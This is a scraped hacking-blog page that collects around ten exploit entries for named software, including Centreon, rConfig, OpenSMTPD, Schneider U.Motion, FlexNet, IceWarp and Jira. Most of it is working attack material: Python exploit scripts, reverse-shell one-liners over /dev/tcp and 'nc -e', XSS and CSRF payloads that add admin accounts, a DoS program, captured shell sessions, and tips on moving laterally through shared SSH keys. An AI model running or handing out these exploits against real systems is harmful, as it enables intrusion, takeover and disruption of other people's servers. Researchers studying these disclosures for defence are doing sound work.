# Exploit Title: Centreon 19.10.5 - 'centreontrapd' Remote Command Execution
# Date: 2020-01-29
# Exploit Author: Fabien AUNAY, Omri Baso
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -
###########################################################################################################
Centreon 19.10.5 Remote Command Execution centreontrapd
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Heath care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
It is possible to get a reverse shell with a snmp trap and gain a pivot inside distributed architecture.
Steps:
Objective 1 : Create a SNMP trap or use linkDown OID with special command in action 3
Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
Objective 3 : Assign service trap relation
Objective 4 : Get centreon id reverse shell
###########################################################################################################
# Objective 1 : Create or use SNMP trap OID with special command in action 3
- Configuration > SNMP Traps
[+] Trap name * : linkDown
[+] OID * : .1.3.6.1.6.3.1.1.5.3
[+] Special Command : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
# Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
- Configuration > Services > Services by host
[+] Description * : TRAP RCE
[+] Linked with Hosts * : YOUR-LINKED-HOST
[+] Check Command * : App-Monitoring-Centreon-Service-Dummy
[+] DUMMYSTATUS : 0
[+] DUMMYOUTPUT : 0
[+] Passive Checks Enabled : YES
[+] Is Volatile : YES
[+] Service Trap Relation : Generic - linkDown
# Objective 3 : Assign service trap relation
- Configuration > SNMP Traps
- linkDown
- Relations
[+] Linked services : YOUR-LINKED-HOST - SERVICE DESCRIPTION
reload Central
Reload snmp config
# Objective 4 : Get centreon id reverse shell and think lateral
[+] Send your trap
snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2
TIP: centreontrapd logfile:
2020-01-29 02:52:33 - DEBUG - 340 - Reading trap. Current time: Wed Jan 29 02:52:33 2020
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (DISMAN-EVENT-MIB::sysUpTimeInstance). Will attempt to translate to a numerical OID
2020-01-29 02:52:33 - DEBUG - 340 - Translated to .1.3.6.1.2.1.1.3.0
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (SNMPv2-MIB::snmpTrapOID.0). Will attempt to translate to a numerical OID
...
2020-01-29 02:52:33 - DEBUG - 340 - Trap found on service 'TRAP RCE' for host 'supervision_IT'.
...
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launch specific command
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launched command: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
..
NOTE: Read the doc !!!
https://documentation-fr.centreon.com/docs/centreon/fr/latest/administration_guide/poller/ssh_key.html?highlight=keygen
The centreon id user shares configurations and instructions with satellite collectors trough SSH.
No passphrase used.
This allows you to move around the infrastructure after your RCE.
POC:
snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2
nc -lvnp 12345
Ncat: Version 7.50
Ncat: Listening on :::12345
Ncat: Listening on 0.0.0.0:12345
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:38470.
id
uid=997(centreon) gid=994(centreon) groups=994(centreon),48(apache),990(centreon-engine),992(centreon-broker)
sudo -l
Matching Defaults entries for centreon on centreonlab:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty
User centreon may run the following commands on centreonlab:
(root) NOPASSWD: /sbin/service centreontrapd start
(root) NOPASSWD: /sbin/service centreontrapd stop
(root) NOPASSWD: /sbin/service centreontrapd restart
(root) NOPASSWD: /sbin/service centreontrapd reload
(root) NOPASSWD: /usr/sbin/service centreontrapd start
(root) NOPASSWD: /usr/sbin/service centreontrapd stop
(root) NOPASSWD: /usr/sbin/service centreontrapd restart
(root) NOPASSWD: /usr/sbin/service centreontrapd reload
(root) NOPASSWD: /sbin/service centengine start
(root) NOPASSWD: /sbin/service centengine stop
(root) NOPASSWD: /sbin/service centengine restart
(root) NOPASSWD: /sbin/service centengine reload
(root) NOPASSWD: /usr/sbin/service centengine start
(root) NOPASSWD: /usr/sbin/service centengine stop
(root) NOPASSWD: /usr/sbin/service centengine restart
(root) NOPASSWD: /usr/sbin/service centengine reload
(root) NOPASSWD: /bin/systemctl start centengine
(root) NOPASSWD: /bin/systemctl stop centengine
(root) NOPASSWD: /bin/systemctl restart centengine
(root) NOPASSWD: /bin/systemctl reload centengine
(root) NOPASSWD: /usr/bin/systemctl start centengine
(root) NOPASSWD: /usr/bin/systemctl stop centengine
(root) NOPASSWD: /usr/bin/systemctl restart centengine
(root) NOPASSWD: /usr/bin/systemctl reload centengine
(root) NOPASSWD: /sbin/service cbd start
(root) NOPASSWD: /sbin/service cbd stop
(root) NOPASSWD: /sbin/service cbd restart
(root) NOPASSWD: /sbin/service cbd reload
(root) NOPASSWD: /usr/sbin/service cbd start
(root) NOPASSWD: /usr/sbin/service cbd stop
(root) NOPASSWD: /usr/sbin/service cbd restart
(root) NOPASSWD: /usr/sbin/service cbd reload
(root) NOPASSWD: /bin/systemctl start cbd
(root) NOPASSWD: /bin/systemctl stop cbd
(root) NOPASSWD: /bin/systemctl restart cbd
(root) NOPASSWD: /bin/systemctl reload cbd
(root) NOPASSWD: /usr/bin/systemctl start cbd
(root) NOPASSWD: /usr/bin/systemctl stop cbd
(root) NOPASSWD: /usr/bin/systemctl restart cbd
(root) NOPASSWD: /usr/bin/systemctl reload cbd
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863170375
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Centreon 19.10.5 - 'Pollers' Remote Command Execution
# Date: 2020-01-27
# Exploit Author: Omri Baso, Fabien Aunay
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7.7
# CVE : -
Centreon 19.10.5 Remote Command Execution Misc
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Heath care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
User input isn't sanitized for safe use - and it is possible to gain a Remote Code Execution of the server
hosting the Centreon Service leading to a full server takeover with the user "apache"
Steps:
1.) <BASEURL>/centreon/main.php?p=60803&type=3
Here we create the Command - can also be found under
Configuration > Commands > Miscellaneous
we Press "Add" -
Command Name: "misc"
Payload: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121
2.) go to: <BASEURL>/centreon/main.php?p=60901
Configuration > Pollers
Open "Central" Poller
add on "Post-Restart command"
the command "misc" we created
make Status "Enabled"
3.) Check the box "Post generation command" in the "Export Configuration" Tab
3.1) Restart Poller and get Shell.
┌─[root@vps]─[~]
└──╼ #nc -lnvp 1234
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:49184.
whoami
apache
id
uid=48(apache) gid=48(apache) groups=48(apache),990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)
___________________________________________________________________
# Exploit Title: Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting
# Date: 2020-01-29
# Exploit Author: LiquidWorm
# Vendor: Fifthplay NV
# Vendor Homepage: https://www.fifthplay.com
# Version: 2019.2_HP
# Tested on: Linux
# CVE : -
Fifthplay S.A.M.I - Service And Management Interface Unauthenticated Stored XSS
Vendor: Fifthplay NV
Product web page: https://www.fifthplay.com
Affected version: Platform: HAM V1.2
HAM V1.1
HAM V1.0
DINHAM 10W
Image Version: 2019.3-20190605144803
2019.2_HP-20190808154634
2018.4_HP-20181015152950
2018.2-20180516100815
2017.2_HP-20180213083050
2013.4_HP-201309301203
AMP Version: 2019.2_HP
2018.4_HP
2017.2_HP
2013.4_HP
R20.19.03
R20.18.02
Fix: 2017.2-HP4
2018.4_HP3
2018.5_HP7
2019.2_HP3
2019.3_HP1
Summary: Fifthplay is a Belgian high-tech player and a subsidiary of Niko Group.
We specialise in enriching smart homes and buildings for almost 10 years, and in
services that provide comfort and energy. Our gateway provides a modular approach
to integrating old and new technologies, such as smart meters, optical meters,
sockets, switches. Fifthplay is a trendsetter with regards to smart homes and buildings
and one of the sector's most innovative companies.
Desc: The application suffers from an unauthenticated stored XSS through POST request.
The issue is triggered when input passed via several parameters is not properly
sanitized before being returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in context of an affected site. The
application interface also allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited
to perform certain actions if a user visits a malicious web site.
Tested on: lighttpd/1.4.33
PHP/5.4.33
PHP/5.3.19
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5561
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5561.php
29.09.2019
--
Stored XSS:
-----------
<html>
<body>
<form action="http://192.168.11.1/?page=networksettings" method="POST">
<input type="hidden" name="server" value='"><script>prompt(251)</script>' />
<input type="hidden" name="port" value='"><script>prompt(252)</script>' />
<input type="hidden" name="auth" value="1" />
<input type="hidden" name="user" value='"><script>prompt(253)</script>' />
<input type="hidden" name="pass" value='"><script>prompt(254)</script>' />
<input type="hidden" name="submit" value="Change" />
<input type="submit" value="Write" />
</form>
</body>
</html>
Set proxy CSRF:
---------------
<html>
<body>
<form action="http://192.168.11.1/?page=networksettings" method="POST">
<input type="hidden" name="server" value="proxy.segfault.mk" />
<input type="hidden" name="port" value="8080" />
<input type="hidden" name="auth" value="1" />
<input type="hidden" name="user" value="testuser" />
<input type="hidden" name="pass" value="testpass" />
<input type="hidden" name="submit" value="Change" />
<input type="submit" value="Write" />
</form>
</body>
</html>
Delete proxy CSRF:
------------------
<html>
<body>
<form action="http://192.168.11.1/?page=networksettings" method="POST">
<input type="hidden" name="server" value="proxy.segfault.mk" />
<input type="hidden" name="port" value="8080" />
<input type="hidden" name="auth" value="1" />
<input type="hidden" name="user" value="testuser" />
<input type="hidden" name="pass" value="testpass" />
<input type="hidden" name="delete" value="Delete" />
<input type="submit" value="Clear" />
</form>
</body>
</html>
# Exploit Title: rConfig 3.9.3 - Authenticated Remote Code Execution
# Date: 2019-11-07
# CVE-2019-19509
# Exploit Author: vikingfr
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
# Version: tested v3.9.3
# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
#
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
# rconfig - CVE-2019-19509 - Web authenticated RCE
# [+] Logged in successfully, triggering the payload...
# [+] Check your listener !
# ...
# $ nc -nvlp 8081
# listening on [any] 8081 ...
# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458
# bash: no job control in this shell
# bash-4.2$ id
# id
# uid=48(apache) gid=48(apache) groups=48(apache)
# bash-4.2$
#!/usr/bin/python3
import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print ("rconfig - CVE-2019-19509 - Web authenticated RCE")
if len(sys.argv) != 6:
print ("[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort")
exit()
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
payload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port)
request = requests.session()
login_info = {
"user": username,
"pass": password,
"sublogin": 1
}
login_request = request.post(
target+"/lib/crud/userprocess.php",
login_info,
verify=False,
allow_redirects=True
)
dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)
if dashboard_request.status_code == 200:
print ("[+] Logged in successfully, triggering the payload...")
encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
print ("[+] Check your listener !")
exploit_req = request.get(encoded_request)
elif dashboard_request.status_code == 302:
print ("[-] Wrong credentials !")
exit()
# Exploit Title: Lotus Core CMS 1.0.1 - Local File Inclusion
# Google Dork: N/A
# Date: 2020-01-31
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: http://lotuscore.sourceforge.net/
# Software Link: https://sourceforge.net/projects/lotuscore/files/latest/download
# Version: 1.0.1
# Tested on: Windows 7 x86
# CVE : N/A
The vulnerability occurs on line 65 of the index.php file, first we can provide the page_slug parameter,
if it's not set by the user it is set to index, but if the user sets the parameter via a GET or POST request,
it checks if the file exists and if it exists, it performs an unsanitized inclusion.
-----------------------------------------------------------------------------
if(!$_REQUEST['page_slug']){
$_REQUEST['page_slug'] = 'index';
}
if(file_exists('system/plugins/'.$_REQUEST['page_slug'].'.php') == true){
include('system/plugins/'.$_REQUEST['page_slug'].'.php');
}else{
include("system/plugins/error/404.php");
}
------------------------------------------------------------------------------
The PHP file appends .php to anything we provide as page_slug parameter so to include any file we must use a nullbyte.
Note that you need to be authenticated to exploit this. The explotation would be like this:
http://site:80/index.php?page_slug=../../../../../etc/passwd%00
# Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution
# Date: 2020-01-29
# Exploit Author: 1F98D
# Original Author: Qualys Security Advisory
# Vendor Homepage: https://www.opensmtpd.org/
# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
# Version: OpenSMTPD < 6.6.2
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2020-7247
# References:
# https://www.openwall.com/lists/oss-security/2020/01/28/3
#
# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
# escape dangerous characters from user-controlled input. An attacker
# can exploit this to execute arbitrary shell commands on the target.
#
#!/usr/local/bin/python3
from socket import *
import sys
if len(sys.argv) != 4:
print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
sys.exit(1)
ADDR = sys.argv[1]
PORT = int(sys.argv[2])
CMD = sys.argv[3]
s = socket(AF_INET, SOCK_STREAM)
s.connect((ADDR, PORT))
res = s.recv(1024)
if 'OpenSMTPD' not in str(res):
print('[!] No OpenSMTPD detected')
print('[!] Received {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] OpenSMTPD detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error connecting, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Connected, sending payload')
s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error sending payload, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Payload sent')
s.send(b'RCPT TO:<root>\r\n')
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')
# Exploit Title: FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)
# Date: 2019-12-29
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.flexerasoftware.com/
# Software : FlexNet Publisher
# Product Version: v11.12.1
# Product : https://www.flexerasoftware.com/monetize/products/flexnet-licensing.html
# Product Version : https://helpnet.flexerasoftware.com/eol/flexnet-publisher.htm
# Vulernability Type : Cross-Site Request Forgery (Add Local Admin)
# Vulenrability : Cross-Site Request Forgery
# Reference : https://community.flexera.com/t5/FlexNet-Publisher-Knowledge-Base/CVE-2019-8962-remediated-in-FlexNet-Publisher/ta-p/131062
# CVE : N/A
HTTP Request :
POST /users HTTP/1.1
Host: SERVER:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://SERVER:8888/users?event=create&licenseTab=
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
Connection: close
Cookie: Webstation-Locale=en-US; sess_lmgrd=32CFC53815147D5362ACAAF100000001; GUEST=1; UID=GUEST; FL=1; FA=1; DM=; user_type_lmgrd=0
Upgrade-Insecure-Requests: 1
licenseTab=&selected=&userType=local-admin&userName=ISMAILTASDELEN&firstName=Ismail&lastName=Tasdelen&password2=Test12345&confirm=Test12345&accountType=admin&checksum=1d00c20815e84c31&Create=Create
HTTP Response :
HTTP/1.1 200 OK
Date: Sun, 29 Dec 2019 08:38:14 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14434
CSRF HTML PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SERVER:8888/users" method="POST">
<input type="hidden" name="licenseTab" value="" />
<input type="hidden" name="selected" value="" />
<input type="hidden" name="userType" value="local-admin" />
<input type="hidden" name="userName" value="ISMAILTASDELEN" />
<input type="hidden" name="firstName" value="Ismail" />
<input type="hidden" name="lastName" value="Tasdelen" />
<input type="hidden" name="password2" value="Test12345" />
<input type="hidden" name="confirm" value="Test12345" />
<input type="hidden" name="accountType" value="admin" />
<input type="hidden" name="checksum" value="1d00c20815e84c31" />
<input type="hidden" name="Create" value="Create" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Title: IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting
# Date: 2020-01-27
# Author: Lutfu Mert Ceylan
# Vendor Homepage: www.icewarp.com
# Tested on: Windows 10
# Versions: 11.4.4.1 and before
# Vulnerable Parameter: "color" (Get Method)
# Google Dork: inurl:/webmail/ intext:Powered by IceWarp Server
# CVE: CVE-2020-8512
# Notes:
# An attacker can use XSS (in color parameter IceWarp WebMail 11.4.4.1 and
# before)to send a malicious script to an unsuspecting Admins or users. The
# end admins or useras browser has no way to know that the script should not
# be trusted, and will execute the script. Because it thinks the script came
# from a trusted source, the malicious script can access any cookies, session
# tokens, or other sensitive information retained by the browser and used
# with that site. These scripts can even rewrite the content of the HTML
# page. Even an attacker can easily place users in social engineering through
# this vulnerability and create a fake field.
# PoC:
# Go to Sign-in page through this path: http://localhost/webmail/ or
http://localhost:32000/webmail/
# Add the "color" parameter to the URL and write malicious code, Example:
http://localhost/webmail/?color="><svg/onload=alert(1)>
# When the user goes to the URL, the malicious code is executed
Example Vulnerable URL: http://localhost/webmail/?color=
"><svg/onload=alert(1)>
# Exploit Title: BearFTP 0.1.0 - 'PASV' Denial of Service
# Date: 2020-01-29
# Exploit Author: kolya5544
# Vendor Homepage: http://iktm.me/
# Software Link: https://github.com/kolya5544/BearFTP/releases
# Version: v0.0.1 - v0.1.0
# Tested on: Ubuntu 18.04
# CVE : CVE-2020-8416
static void Main(string[] args)
{
Console.WriteLine("DoS started. Approx. time to complete: 204 seconds.");
for (int i = 0; i < 1024*8; i++) // We will do 8000+ connections. Usually server only spawns half of them.
{
new Thread(() =>
{
Thread.CurrentThread.IsBackground = true;
TcpClient exploit = new TcpClient("HOSTNAME", PASV_PORT); //Replace with actual data to test it.
var ns = exploit.GetStream();
StreamWriter sw = new StreamWriter(ns);
sw.AutoFlush = true;
StreamReader sr = new StreamReader(ns);
while (true)
{
Thread.Sleep(5000); //We just spend our time.
}
}).Start();
Thread.Sleep(25); //Spawn a new connection every 25ms so we don't kill our own connection.
}
while (true)
{
Console.WriteLine("DoS attack completed!");
Thread.Sleep(20000);
}
}
/*
BEFORE PATCH APPLIED (after ~100 seconds of attacking):
3700 threads spawned, VIRT went from 3388M to 32.1G, RES from 60000 to 129M. CPU usage ~10%. The server struggles to process commands. Recovers in several minutes after the attack is stopped
AFTER PATCH APPLIED:
10 threads spawned at most, VIRT didnt change, RES didnt change. CPU usage ~3%. Works fine. */
# Exploit Title: Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection
# Date: 2018-08-01
# Exploit Author: Cosmin Craciun
# Vendor Homepage: https://www.se.com
# Version: <= 1.3.4
# Tested on: Delivered Virtual Appliance running on Windows 10 x64
# CVE : CVE-2018-7777
# References: https://github.com/cosmin91ro
#!/usr/bin/oython
from __future__ import print_function
import httplib
import urllib
import argparse
import re
import sys
import socket
import threading
import time
parser = argparse.ArgumentParser(description='PoC')
parser.add_argument('--target', help='IP or hostname of target', required=True)
parser.add_argument('--port', help='TCP port the target app is running', required=True, default='8080')
parser.add_argument('--username', help='TCP port the target app is running', required=True, default='admin')
parser.add_argument('--password', help='TCP port the target app is running', required=True, default='admin')
parser.add_argument('--command', help='malicious command to run', default='shell')
parser.add_argument('--src_ip', help='IP of listener for the reverse shell', required=True)
parser.add_argument('--timeout', help='time in seconds to wait for a response', type=int, default=3)
class Exploiter(threading.Thread):
def __init__ (self, target, port, timeout, uri, body, headers, shell_mode):
threading.Thread.__init__(self)
self.target = target
self.port = port
self.timeout = timeout
self.uri = uri
self.body = body
self.headers = headers
self.shell_mode = shell_mode
def send_exploit(self, target, port, timeout, uri, body, headers):
print('Sending exploit ...')
conn = httplib.HTTPConnection("{0}:{1}".format(target, port), timeout=timeout)
conn.request("POST", uri, body, headers)
print("Exploit sent")
if not self.shell_mode: print("Getting response ...")
try:
response = conn.getresponse()
if not self.shell_mode: print(str(response.status) + " " + response.reason)
data = response.read()
if not self.shell_mode: print('Response: {0}\r\nCheck the exploit result'.format(data))
except socket.timeout:
if not self.shell_mode: print("Connection timeout while waiting response from the target.\r\nCheck the exploit result")
def run(self):
self.send_exploit(self.target, self.port, self.timeout, self.uri, self.body, self.headers)
class Listener(threading.Thread):
def __init__(self, src_ip):
threading.Thread.__init__(self)
self.src_ip = src_ip
def run(self):
self.listen(self.src_ip)
def listen(self, src_ip):
TCP_IP = src_ip
TCP_PORT = 4444
BUFFER_SIZE = 1024
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((TCP_IP, TCP_PORT))
print("Listener open on port {0}".format(TCP_PORT))
s.listen(1)
conn, addr = s.accept()
print('Exploited: ' + str(addr))
while 1:
comm = raw_input("shell$ ").strip()
if comm == "quit":
conn.close()
sys.exit(0)
if comm != "":
conn.send(comm + " 2>&1" + "\x0a")
while 1:
data = conn.recv(BUFFER_SIZE)
if not data: break
print(data, end="")
if "\x0a" in data: break
except Exception as ex:
print("Could not start listener")
print(ex)
def login(target, port, username, password):
uri = "http://{0}:{1}/umotion/modules/system/user_login.php".format(target, port)
params = urllib.urlencode({
'username': username,
'password': password,
'rememberMe': '1',
'context': 'configuration',
'op': 'login'
})
headers = {
"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept": "*/*"
}
try:
conn = httplib.HTTPConnection("{0}:{1}".format(target, port))
conn.request("POST", uri, params, headers)
response = conn.getresponse()
print(str(response.status) + " " + response.reason)
data = response.read()
except socket.timeout:
print("Connection timeout while logging in. Check if the server is available")
return
cookie = response.getheader("Set-Cookie")
#print(cookie)
r = re.match(r'PHPSESSID=(.{26});.*loginSeed=(.{32})', cookie)
if r is None:
print("Regex not match, could not get cookies")
return
if len(r.groups()) < 2:
print("Error while getting cookies")
return
sessid = r.groups()[0]
login_seed = r.groups()[1]
return sessid, login_seed
conn.close()
def encode_multipart_formdata(fields, files):
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
CRLF = '\r\n'
L = []
for (key, value) in fields:
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(value)
for (key, filename, value) in files:
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
L.append('Content-Type: application/x-gzip')
L.append('')
L.append(value)
L.append('--' + LIMIT + '--')
L.append('')
body = CRLF.join(L)
content_type = 'multipart/form-data; boundary=%s' % LIMIT
return content_type, body
def exploit(target, port, username, password, command, timeout):
uri = "http://{0}:{1}/umotion/modules/system/update_module.php".format(target, port)
fields = [
('choose_update_mode', 'MANUAL'),
('add_button', '0'),
('format', 'json'),
('step', '2'),
('next', '1'),
('name_update_file', ''),
('path_update_file', ''),
('type_update_file', '')
]
listener = None
if command == "shell":
shell_mode = True
command = "nc -e $SHELL {0} 4444".format(args.src_ip)
listener = Listener(args.src_ip)
listener.start()
time.sleep(3)
else:
shell_mode = False
files = [
('update_file', 'my;{0};file.tar.gz'.format(command), "\x1f\x8b")
]
content_type, body = encode_multipart_formdata(fields, files)
if not shell_mode or (shell_mode and listener and listener.isAlive()):
print('Logging in ...')
sess_id, login_seed = login(target, port, username, password)
if sess_id is None or login_seed is None:
print('Error while logging in')
return
print('Logged in ! ')
headers = {
'Accept': 'application/json,text/javascript,*/*; q=0.01',
'Accept-Encoding': 'gzip,deflate',
'Referer': 'http://{0}:{1}/umotion/modules/system/externalframe.php?context=configuration'.format(target, port),
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': len(body),
'Content-Type': content_type,
'Connection': 'keep-alive',
'Cookie': 'PHPSESSID={0}; loginSeed={1}'.format(sess_id, login_seed)
}
exploiter = Exploiter(target, port, timeout, uri, body, headers, shell_mode)
exploiter.start()
if __name__ == '__main__':
args = parser.parse_args()
exploit(args.target, args.port, args.username, args.password, args.command, args.timeout)
# Exploit Title: Jira 8.3.4 - Information Disclosure (Username Enumeration)
# Date: 2019-09-11
# Exploit Author: Mufeed VH
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira
# Version: 8.3.4
# Tested on: Pop!_OS 19.10
# CVE : CVE-2019-8449
# CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4
# DETAILS :: https://www.cvedetails.com/cve/CVE-2019-8449/
# CONFIRM :: https://jira.atlassian.com/browse/JRASERVER-69796
#!/usr/bin/env python
__author__ = "Mufeed VH (@mufeedvh)"
import os
import requests
class CVE_2019_8449:
def ask_for_domain(self):
domain = raw_input("[>] Enter the domain of Jira instance: => ")
if domain == "":
print("\n[-] ERROR: domain is required\n")
self.ask_for_domain()
self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain)
def ask_for_query(self):
self.query = raw_input("[>] Enter search query: [required] (Example: admin) => ")
if self.query == "":
print("\n[-] ERROR: The query parameter is required\n")
self.ask_for_query()
def exploit(self):
self.ask_for_domain()
self.ask_for_query()
maxResults = raw_input("\n[>] Enter the number of maximum results to fetch: (50) => ")
showAvatar = raw_input("\n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ")
fieldId = raw_input("\n[>] Enter the fieldId to fetch: => ")
projectId = raw_input("\n[>] Enter the projectId to fetch: => ")
issueTypeId = raw_input("\n[>] Enter the issueTypeId to fetch: => ")
avatarSize = raw_input("\n[>] Enter the size of Avatar to fetch: (xsmall) => ")
caseInsensitive = raw_input("\n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ")
excludeConnectAddons = raw_input("\n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ")
params = {
'query': self.query,
'maxResults': maxResults,
'showAvatar': showAvatar,
'fieldId': fieldId,
'projectId': projectId,
'issueTypeId': issueTypeId,
'avatarSize': avatarSize,
'caseInsensitive': caseInsensitive,
'excludeConnectAddons': excludeConnectAddons
}
send_it = requests.get(url = self.url, params = params)
try:
response = send_it.json()
except:
print("\n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.")
print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.")
print("[-] INFO: Try visting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url))
quit()
print("\n<========== RESPONSE ==========>\n")
print(response)
print("\n<==============================>\n")
if __name__ == '__main__':
os.system('cls' if os.name == 'nt' else 'clear')
print('''
================================================
| |
| CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 |
| Proof of Concept By: Mufeed VH [@mufeedvh] |
| |
================================================
''')
CVE_2019_8449().exploit()
